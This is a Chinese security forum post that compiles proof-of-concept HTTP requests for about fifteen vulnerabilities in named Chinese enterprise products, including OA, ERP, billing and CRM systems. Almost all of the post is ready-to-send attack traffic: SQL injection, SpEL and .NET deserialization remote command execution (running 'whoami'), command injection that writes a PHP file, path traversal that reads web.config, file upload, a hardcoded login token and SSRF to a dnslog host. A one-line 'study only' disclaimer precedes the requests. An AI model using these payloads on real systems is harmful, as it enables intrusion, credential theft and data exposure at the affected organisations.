DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 2490|回复: 0

[2024] PoC 整理 (二)

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2024-8-16 10:35:30 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

北京派网软件有限公司 Panabit-Panalog 大数据日志审计系统 sprog_upstatus.php 存在 SQL 注入漏洞


  1. GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
  2. Host:
  3. Accept-Encoding: gzip, deflate, br, zstd
  4. Accept-Language: zh-CN,zh;q=0.9
  5. Cache-Control: max-age=0
  6. Connection: keep-alive
  7. Cookie: PHPSESSID=f8la8ttr74fkge0pttpc626p45
复制代码

契约锁电子签章平台ukeysign存在远程命令执行漏洞


  1. POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  4. Gecko) Chrome/113.0.0.0 Safari/537.36
  5. Content-Type: application/json

  6. {"id":"2","params":[{"expression":"var a=new
  7. org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编
  8. 码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-
  9. 8');var c=a.parseExpression(deStr);c.getValue();"}]}
复制代码

任我行协同CRM系统UploadFile存在反序列化漏洞


  1. POST /SystemManage/UploadFile HTTP/1.1
  2. Host: {{Hostname}}
  3. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
  6. Gecko) Chrome/83.0.4103.116 Safari/537.36
  7. Accept:
  8. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  9. Accept-Encoding: gzip, deflate
  10. Content-Type: application/x-www-form-urlencoded

  11. photoInfo={
  12. '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{
  13. '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c whoami']
  14. },'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
  15. }
复制代码

瑞斯康达-多业务智能网关-RCE


  1. GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate, br
  7. Connection: close
复制代码

赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞


  1. GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
  2. Host:
复制代码

赛蓝企业管理系统GetJSFile存在任意文件读取漏洞


  1. GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
  4. Accept: */*
  5. Accept-Encoding: gzip, deflate, br
  6. Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
  7. Connection: close
复制代码

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞


  1. GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
  2. Host:
  3. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  4. Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
  5. Priority: u=0, i
  6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
  8. Accept-Encoding: gzip, deflate
  9. Upgrade-Insecure-Requests: 1
复制代码

深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)


  1. POST /strategy/ip/bind-ip HTTP/2
  2. Host:
  3. Content-Type: application/x-www-form-urlencoded

  4. data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
复制代码

拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞


  1. POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1
  2. Accept: */*
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
  4. Connection: close
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

  6. ------WebKitFormBoundarySl8siBbmVicABvTX
  7. Content-Disposition: form-data; name="file";
  8. filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"
  9. Content-Type: application/octet-stream

  10. 1234
  11. ------WebKitFormBoundarySl8siBbmVicABvTX--
复制代码

天问物业ERP系统ContractDownLoad存在任意文件读取漏洞


  1. GET /HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept-Language: zh-CN,zh;q=0.9
  6. Connection: close
复制代码

天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞


  1. GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept-Language: zh-CN,zh;q=0.9
  6. Connection: close
复制代码

天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞


  1. GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Accept-Encoding: gzip, deflate
  5. Accept-Language: zh-CN,zh;q=0.9
  6. Connection: close
复制代码

通达OAV11.10接口login.php存在SQL注入漏洞


  1. POST /ispirit/interface/login.php HTTP/1.1
  2. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
  3. Content-Type: application/x-www-form-urlencoded
  4. Host:
  5. Content-Length: 107

  6. name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'
复制代码

万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)


  1. GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
  2. Host:
复制代码

用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞


  1. POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
  9. Upgrade-Insecure-Requests: 1
  10. Priority: u=0, i
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 36

  13. {
  14.   "address":"ftlhbc.dnslog.cn"
  15. }
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 00:47 , Processed in 0.059250 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表